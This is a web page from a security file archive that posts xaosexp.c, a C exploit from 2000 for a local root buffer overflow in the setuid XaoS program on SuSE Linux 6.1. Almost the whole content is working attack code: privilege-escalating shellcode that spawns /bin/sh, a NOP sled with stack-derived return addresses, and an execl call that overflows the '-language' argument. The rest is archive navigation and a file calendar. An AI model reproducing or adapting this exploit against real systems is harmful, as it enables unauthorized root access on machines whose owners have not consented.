what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

xaosexp.c

xaosexp.c
Posted May 27, 2000
Authored by DiGiT | Site security.is

/usr/bin/xaos local root buffer overflow exploit. Works on suse 6.1, and could be modified for 6.2.

tags | exploit, overflow, local, root
systems | linux, suse
SHA-256 | 41063c66d14d76b252432334dc2031dd8d874cf94f253caf555c2a55974289a0

xaosexp.c

Change Mirror Download
// PRIVATE!!
//
// suid XaoS local overflow exploit - root comprimise.
// _works_ on suse 6.1, is in the suid list for 6.2:>.
//
// Discovered by DiGiT & p0rtal.
//
// author: DiGiT - teddi@linux.is
// Greets: #hax, #!ADM
//
// PRIVATE!!

#include <stdio.h>
#include <string.h>


unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}

char shellcode[] =

// wacho set(e)uid() + generic shell.
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xc9\x31\xc0\xb0\x46\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

void
main (int argc, char *argv[])
{
char *buf;

int bsize=4100;
int offset = 0;
int len = 3914;
int i;

if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) len = atoi(argv[3]);

buf = malloc(bsize);
memset (buf, '\x90', bsize);

for (i = len; i < bsize - 4; i += 4)
*(long *) &buf[i] = get_sp() - offset;

memcpy (buf + (len - strlen (shellcode)), shellcode, strlen (shellcode));

buf[bsize - 1] = '\0';

printf("ret-addr = 0x%x\n", get_sp() - offset);
printf("May you have many children and live a long life.\n");

execl("/usr/bin/xaos", "xaos", "-language", buf, NULL);

}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close